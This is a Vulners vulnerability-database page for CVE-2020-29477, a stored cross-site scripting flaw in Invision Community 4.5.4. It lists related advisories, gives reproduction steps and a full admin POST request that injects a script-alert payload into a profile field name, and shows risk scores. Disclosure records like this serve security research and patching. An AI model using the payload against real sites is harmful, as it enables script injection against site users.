Vulners
Lucene search
Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Invision Community 跨站脚本漏洞 | 30 Dec 202000:00 | – | cnnvd |
 | Invision Community Cross-Site Scripting Vulnerability | 3 Jan 202100:00 | – | cnvd |
 | CVE-2020-29477 | 30 Dec 202014:19 | – | cve |
 | CVE-2020-29477 | 30 Dec 202014:19 | – | cvelist |
 | EUVD-2020-21845 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-29477 | 30 Dec 202015:15 | – | nvd |
 | Cross site scripting | 30 Dec 202015:15 | – | prion |
 | CVE-2020-29477 | 22 May 202517:02 | – | redhatcve |
# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
# Date: 02-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://invisioncommunity.com/
# Software Link: https://invisioncommunity.com/buy
# Version: 4.5.4
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29477
Vulnerable Parameters: Profile - Field Name.
Steps-To-Reproduce:
1. Go to the Invision Community admin page.
2. Now go to the Members - MEMBER SETTINGS - Profiles.
3. Now click on Add Profile field.
4. Put the below payload in Field Name:
"<script>alert(123)</script>"
5. Now click on Save button.
6. The XSS will be triggered.
POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 660
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: XYZ
form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2020 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 23.5
CVSS 3.14.8
EPSS0.00573